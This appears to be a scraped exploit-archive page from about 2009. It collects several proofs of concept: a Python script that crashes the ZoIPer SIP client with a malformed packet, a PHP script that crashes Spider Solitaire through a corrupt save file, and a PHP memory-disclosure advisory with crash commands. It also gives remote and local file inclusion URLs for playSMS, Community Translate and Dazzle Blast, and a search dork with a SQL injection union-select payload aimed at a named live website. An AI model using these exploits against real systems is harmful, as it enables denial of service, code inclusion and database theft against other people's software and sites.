Spider Solitaire local crash proof of concept exploit for Windows XP SP2.

/*
Spider Solitaire (Windows XP SP2) Local Crash PoC
By SirGod
www.insecurity.ro
www.twitter.com/SirGod
Loading a corrupt save file(spider.sav) will result in a local crash
of Spider Solitaire
*/
$username="pwn"; //Replace with your computer username
$file="spider.sav";
$junk="Spider Solitaire Local Crash";
$handle = fopen($file, 'w') or die("Can't create file");
fwrite($handle,$junk);
fclose($handle);
$file2="C:/Documents and Settings/" .$username. "/My Documents/spider.sav";
if(!copy($file,$file2))
{
die("Can't copy file");
}
else
{
echo "File succesfully copied.Open Spider Solitaire and load the
last saved game";
};
?>

Read More

ZoIPer v2.22 Call-Info Remote Denial Of Service

#!/usr/bin/python

# ZoIPer v2.22 Call-Info Remote Denial Of Service.
# Remote Crash P.O.C.
# Author: Tomer Bitton (Gr33n_G0bL1n)
# Tested on Windows XP SP2 , SP3 , Ubuntu 8.10
#
# Vendor Notified on: 21/09/2009
# Vendor Fix: Fixed in version 2.24 Library 5324
#
# Bad Chars: \x20 , \x09

import sys
import socket
import os


def main(argc , argv):

if len(sys.argv) != 2:
os.system("cls")
sys.exit("Usage: " + sys.argv[0] + " \n")

target_host = sys.argv[1]
target_port = 5060

evil_packet =
"\x49\x4e\x56\x49\x54\x45\x20\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31"+\
"\x30\x2e\x30\x2e\x30\x2e\x31\x20\x53\x49\x50\x2f\x32\x2e\x30\x0d"+\
"\x0a\x56\x69\x61\x3a\x20\x53\x49\x50\x2f\x32\x2e\x30\x2f\x55\x44"+\
"\x50\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31"+\
"\x3a\x31\x32\x39\x38\x3b\x62\x72\x61\x6e\x63\x68\x3d\x7a\x39\x68"+\
"\x47\x34\x62\x4b\x4a\x52\x6e\x54\x67\x67\x76\x4d\x47\x6c\x2d\x36"+\
"\x32\x33\x33\x0d\x0a\x4d\x61\x78\x2d\x46\x6f\x72\x77\x61\x72\x64"+\
"\x73\x3a\x20\x37\x30\x0d\x0a\x46\x72\x6f\x6d\x3a\x20\x4d\x6f\x72"+\
"\x70\x68\x65\x75\x73\x20\x3c\x73\x69\x70\x3a\x4d\x6f\x72\x70\x68"+\
"\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31"+\
"\x33\x31\x3e\x3b\x74\x61\x67\x3d\x66\x37\x6d\x58\x5a\x71\x67\x71"+\
"\x5a\x79\x2d\x36\x32\x33\x33\x0d\x0a\x54\x6f\x3a\x20\x4e\x65\x6f"+\
"\x20\x3c\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31\x30\x2e\x30\x2e\x30"+\
"\x2e\x31\x3e\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x44\x3a\x20\x77\x53"+\
"\x48\x68\x48\x6a\x6e\x67\x39\x39\x2d\x36\x32\x33\x33\x40\x31\x39"+\
"\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31\x0d\x0a\x43\x53"+\
"\x65\x71\x3a\x20\x36\x32\x33\x33\x20\x49\x4e\x56\x49\x54\x45\x0d"+\
"\x0a\x43\x6f\x6e\x74\x61\x63\x74\x3a\x20\x3c\x73\x69\x70\x3a\x4d"+\
"\x6f\x72\x70\x68\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e"+\
"\x35\x37\x2e\x31\x33\x31\x3e\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74"+\
"\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69"+\
"\x6f\x6e\x2f\x73\x64\x70\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x6e\x66"+\
"\x6f\x3a\x20\x20\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c"+\
"\x65\x6e\x67\x74\x68\x3a\x20\x31\x32\x35\x0d\x0a\x0d\x0a"

os.system("cls")
print "[+] ZoIPer Call-Info Remote Denial Of Service\r\n"
print "[+] Exploited By Gr33n_G0bL1n\r\n"
print "[+] Connecting to %s on port %d\r\n" % (target_host,target_port)

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect((target_host,target_port))
print "[+] Trying To Send Evil Packet...\r\n"
s.sendall(evil_packet)
s.close()
print "[+] Done!\r\n"
except:
print "[x] Connection Error!\r\n"


if (__name__ == "__main__"):
sys.exit(main(len(sys.argv), sys.argv))

Read More

PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 10.07.2009
- - Pub.: 06.08.2009

Risk: High

Affected Software:
- - PHP 5.3.0
- - PHP 5.2.10

Original URL:
http://securityreason.com/achievement_securityalert/65

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write
dynamically generated pages quickly.

http://lu2.php.net/manual/en/function.ini-restore.php

ini_restore ? Restores the value of a configuration option

ini_restore ( string $varname )

- --- 1. PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure ---
The main problem exist in restoring php config environments. To demonstrate
the problem, we need to declare variables via ini_set() function. When we
try use ini_restore(), variables in class PG() will indicate any part of
memory.

- ---zend_ini.c---
static int zend_restore_ini_entry_cb(zend_ini_entry *ini_entry, int stage
TSRMLS_DC) /* {{{ */
{
if (ini_entry->modified) {
if (ini_entry->on_modify) {
zend_try {
/* even if on_modify bails out, we have to continue on with restoring,
since there can be allocated variables that would be freed on MM
shutdown
and would lead to memory corruption later ini entry is modified again
*/
ini_entry->on_modify(ini_entry, ini_entry->orig_value,
ini_entry->orig_value_length, ini_entry->mh_arg1, ini_entry->mh_arg2,
ini_entry->mh_arg3, stage TSRMLS_CC);
} zend_end_try();
}
if (ini_entry->value != ini_entry->orig_value) {
efree(ini_entry->value);
}
ini_entry->value = ini_entry->orig_value;
ini_entry->value_length = ini_entry->orig_value_length;
ini_entry->modified = 0;
ini_entry->orig_value = NULL;
ini_entry->orig_value_length = 0;
if (ini_entry->modifiable >= (1 << 3)) {
ini_entry->modifiable >>= 3;
}
}
return 0;
}
- ---zend_ini.c---

Flag modified will be reset, and we can not considered modified variable.
We don't check value of ini_entry->on_modify() and PG() will be now out of
memory range.

To demonstrate this issue

- ---example0 (5.2.10/5.3.0)---
127# uname -a && php -v
OpenBSD 127.cxib 4.6 GENERIC#0 i386
PHP 5.2.10 with Suhosin-Patch 0.9.7 (cli) (built: Jul 5 2009 21:43:12)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2009 Zend Technologies
with Suhosin v0.9.27, Copyright (c) 2007, by SektionEins GmbH
127# cat /var/www/www/sess.php

ini_set("session.save_path", "0123456789ABCDEF");
ini_restore("session.save_path");
session_start();
?>
127# php /var/www/www/sess.php AAA
PHP Warning: session_start():
open($­|456789ABCDEF/sess_c7lv2k3bndfi25mhohq0nm7s06, O_RDWR) failed: No
such file or directory (2) in /var/www/www/sess.php on line 5
PHP Warning: Unknown:
open($­|456789ABCDEF/sess_c7lv2k3bndfi25mhohq0nm7s06, O_RDWR) failed: No
such file or directory (2) in Unknown on line 0
PHP Warning: Unknown: Failed to write session data (files). Please verify
that the current setting of session.save_path is correct ($­|ma: no-cache)
in Unknown on line 0
127# php /var/www/www/sess.php
PHP Warning: session_start():
open(¤^j|456789ABCDEF/sess_o9urrs37iabfg3tqvjuh07c1l1, O_RDWR) failed: No
such file or directory (2) in /var/www/www/sess.php on line 5
PHP Warning: Unknown:
open(¤^j|456789ABCDEF/sess_o9urrs37iabfg3tqvjuh07c1l1, O_RDWR) failed: No
such file or directory (2) in Unknown on line 0
PHP Warning: Unknown: Failed to write session data (files). Please verify
that the current setting of session.save_path is correct (¤^j|ma: no-cache)
in Unknown on line 0
- ---example0 (5.2.10/5.3.0)---

The main problem is started in ini_restore("session.save_path"). To show
this issue, we need use some function with PG() inside (like:
session_start()).

- ---example1 (5.3.0)---
127# uname -mrs && php -v
NetBSD 5.0 i386
PHP 5.3.0 (cli) (built: Jul 15 2009 23:47:25)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyrght (c) 1998-2009 Zend Technologies
127# cat /www/file.php
ini_set("open_basedir", "A");
ini_restore("open_basedir");
ini_get("open_basedir");


include("B");

?>

127# php /www/file.php
PHP Warning: include(): open_basedir restriction in effect. File(B) is not
within the allowed path(s): (4?e»X?p») in /www/file.php on line
7

Warning: include(): open_basedir restriction in effect. File(B) is not
within the allowed path(s): (4?e»X?p») in /www/file.php on line
7
PHP Warning: include(B): failed to open stream: Operation not permitted in
/www/file.php on line 7

Warning: include(B): failed to open stream: Operation not permitted in
/www/file.php on line 7
PHP Warning: include(): Failed opening 'B' for inclusion
(include_path='.:/usr/pkg/lib/php') in /www/file.php on line 7

Warning: include(): Failed opening 'B' for inclusion
(include_path='.:/usr/pkg/lib/php') in /www/file.php on line 7

127# curl http://localhost/file.php


Warning: include() [href='function.include'>function.include]: open_basedir restriction in
effect. File(B) is not within the allowed path(s): (°?e»Hup») in
/www/file.php on line 7



Warning: include(B) [href='function.include'>function.include]: failed to open stream:
Operation not permitted in /www/file.php on line 7



Warning: include() [href='function.include'>function.include]: Failed opening 'B' for
inclusion (include_path='.:/usr/pkg/lib/php') in /www/file.php on
line 7

- ---example1 (5.3.0)---

Variable PG(open_basedir) is now out of range. So any function (like:
include()) with

php_error_docref(NULL TSRMLS_CC, E_WARNING, "open_basedir restriction in
effect. File(%s) is not within the allowed path(s): (%s)", path,
PG(open_basedir));

will print memory

examples:
- ---
Warning: ini_restore() [function.ini-restore]: open_basedir restriction in
effect. File() is not within the allowed path(s): (¤©f»ESSID) in
/www/ssij.php on line 8

Warning: ini_restore() [function.ini-restore]: open_basedir restriction in
effect. File() is not within the allowed path(s): (,ªf»aaaaaa) in
/www/ssij.php on line 8

Warning: ini_restore() [function.ini-restore]: open_basedir restriction in
effect. File() is not within the allowed path(s): (?¬f»ESSID) in
/www/ssij.php on line 8

Warning: ini_restore() [function.ini-restore]: open_basedir restriction in
effect. File() is not within the allowed path(s): (ÈËe»ef_root)
in /www/ssij.php on line 8

Warning: ini_restore() [function.ini-restore]: open_basedir restriction in
effect. File() is not within the allowed path(s): (4Íe»r.ini) in
/www/ssij.php on line 8
- ---

Variables in class PG, may take any value.
So code such as

if (PG(open_basedir) && php_check_open_basedir(new_value TSRMLS_CC))

can be manipulated.

But not only zend_ini.c have issue. When we try use ini_set() and
ini_restore() for error_log, php will crash.

Function OnUpdateErrorLog, dosen't check that new_value is empty (null
point). It should provide to crash.

- ---main.c---
static PHP_INI_MH(OnUpdateErrorLog)
{
...
/* Only do the safemode/open_basedir check at runtime */
if ((stage == PHP_INI_STAGE_RUNTIME || stage == PHP_INI_STAGE_HTACCESS)
&& strcmp(new_value, "syslog")) {
...
- ---main.c---

strcmp(3) will check new_value. So new_value can not be NULL.

here:

STD_PHP_INI_ENTRY("error_log", NULL, PHP_INI_ALL, OnUpdateErrorLog,
error_log, php_core_globals, core_globals)


default error_log is NULL

...("error_log", NULL,...

so if we put some string, and remove it, php should crash

127# php -r 'ini_set("error_log","A");ini_restore("error_log");'
Segmentation fault (core dumped)

127# gdb -q php
(gdb) r -r 'ini_set("error_log","A");ini_restore("error_log");'
Starting program: /usr/local/bin/php -r
'ini_set("error_log","A");ini_restore("error_log");'

Program received signal SIGSEGV, Segmentation fault.
0x288ee410 in strcmp () from /lib/libc.so.7

bt:
#0 0x288ee410 in strcmp () from /lib/libc.so.7
#1 0x081c7b85 in OnUpdateErrorLog (entry=0x28a65a80, new_value=0x0,
new_value_length=3, mh_arg1=0x38, mh_arg2=0x83d5420, mh_arg3=0x0,
stage=16)
at /usr/ports/lang/php5/work/php-5.3.0/main/main.c:354
#2 0x0824cb85 in zend_restore_ini_entry_cb (ini_entry=0x28a65a80,
stage=16)
at /usr/ports/lang/php5/work/php-5.3.0/Zend/zend_ini.c:55
#3 0x0824d3f5 in zend_restore_ini_entry (name=0x28a1e36c "error_log",
name_length=10, stage=16)
...

Functions like OnUpdateErrorLog, should check, that new_value is not a NULL
pointer.

- --- 2. Fix ---
(5.3.0):
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/Zend/zend_ini.c
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/main/main.c

(5.2.10):
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/Zend/zend_ini.c
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/main/main.c

- --- 3. Greets ---
stas

sp3x Infospec Chujwamwdupe p_e_a pi3

- --- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib {a.t] securityreason [d00t} com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl

-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAkp7FoMACgkQpiCeOKaYa9YWFwCbBhEvA69nQDgwXyuDdU8wbjmu
ZIEAniHiQ3puTKqEtw9u8g6/T/806j7A
=DvtO
-----END PGP SIGNATURE-----

Read More

playSMS ver 0.9.4 RFI & LFI Vulnerability

[o]====================================[o]
[x] playSMS version 0.9.4 [x]
[x] RFI&LFI Vulnerability [x]

Download:http://playsms.sourceforge.net/ 167.9 KB
Date : 14 Oct 2009
[o]====================================[o]

file: /lib/function.php

// main functions
include "$apps_path[libs]/fn_logger.php"; line 4
include "$apps_path[libs]/fn_auth.php"; line 5
include "$apps_path[libs]/fn_user.php"; line 6
include "$apps_path[libs]/fn_sendsms.php"; line 7
include "$apps_path[libs]/fn_sendmail.php"; line 8
include "$apps_path[libs]/fn_phonebook.php"; line 9
include "$apps_path[libs]/fn_core.php"; line 10
include "$apps_path[libs]/fn_themes.php"; line 11

// init global variables
include "$apps_path[libs]/lib_init1.php"; line 14

// custom functions before plugins loading
include "$apps_path[libs]/fn_custom1.php"; line 17

// init global variables
include "$apps_path[libs]/lib_init2.php"; line 65

// custom functions before plugins loading
include "$apps_path[libs]/fn_custom2.php"; line 68

http://localhost/[path]/lib/function.php?apps_path[libs]=[tutung-RFI]

[o]====================================[o]

file: /plugin/themes/default/init.php

include $apps_path[themes]."/".$themes_module."/config.php";
include $apps_path[themes]."/".$themes_module."/fn.php"; line 3

http://localhost/[path]/plugin/themes/default/init.php?apps_path[themes]=[tutung-RFI]
http://localhost/[path]/plugin/themes/default/init.php?themes_module=[tutung-LFI]

[o]====================================[o]

file: /plugin/gateway/gnokii/init.php

include "$apps_path[plug]/gateway/$gateway_module/config.php"; line 2
include "$apps_path[plug]/gateway/$gateway_module/fn.php"; line 3

http://localhost/[path]/plugin/gateway/gnokii/init.php?apps_path[plug]=[tutung-RFI]
http://localhost/[path]/plugin/gateway/gnokii/init.php?gateway_module=[tutung-LFI]

[o]====================================[o]

i think bug was publish by
ahmadbady [kivi_hacker666@yahoo.com] at playSMS version 0.9.3
but vendor still don't have update the bug at playSMS version 0.9.4,
so it's not same version right? :D

colek-colek
: All Brotha Antisecurity[dot]Org www.MainHack.net www.ServerIsDown.org
Jack-, Vrs_hCk, OoN_Boy, NoGe, zxvf, Yadoy666, s3t4n, r3v4n_b4st4rd,
pizzyroot,
em|nem, s4va,
kecemplungkalen, xr00tb0y
xshadow, Tante Angela Chang, IrcMafia
Indonesian Coder
Don Tukulesto, M3NW5, m364tr0n, cyb3r_tr0n

./noname

[o]====================================[o]

Read More

jasakom has been hacked

Read More

Redcat Media SQL Injection Vulnerability

x]==========================================[x]
| AntiSecurity[dot]org |
[x]==========================================[x]
[x]==========================================[x]

| Title : redcat media (inurl:index.php?contentId=) SQL Injection Vulnerability
| Vendor : http://www.redcatmedia.co.uk/
| Date : 2 oktober 2009 ( Indonesia )
| Author : s4va
| Contact : sava_sword@yahoo.com
| Blog : http://s4vaworld.uni.cc

[x]==========================================[x]

| Dork : “Powered by RedCat” inurl:index.php?contentId=

[x]==========================================[x]

| Exploit
| http://target/index.php?contentId=[sql]

[x]==========================================[x]

| Proof of concept
|
http://www.5ringstelecom.com/index.php?contentId=-26%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17–

[x]==========================================[x]

| THX TO:
|blackstar ; x-shadow ; cr4wl3r ; bl4ck_3n91n3 ; k0il ; inc0mp13te ; [...]

Read More

Community Translate RFI Vuln

[o] Community Translate Remote File Inclusion Vulnerability
Software : Community Translate
Project Home : http://code.google.com/p/communitytranslate/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/

[o] Vulnerable file
require_once("$rd/include/utilfunctions.php");

include/functions.php

[o] Exploit
http://localhost/[path]/include/functions.php?rd=[evilc0de]

Read More

Dazzle Blast RFI Vuln

[o] Dazzle Blast Remote File Inclusion Vulnerability
Software : Dazzle Blast
Download : http://www.dazzleblast.com/dazzleblast.zip
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/

[o] Vulnerable file
require_once($ROOTDIR.'admin/functions/general.php');

admin/includes/createemails.php


[o] Exploit
http://localhost/[path]/admin/includes/createemails.php?ROOTDIR=[evilc0de]

Read More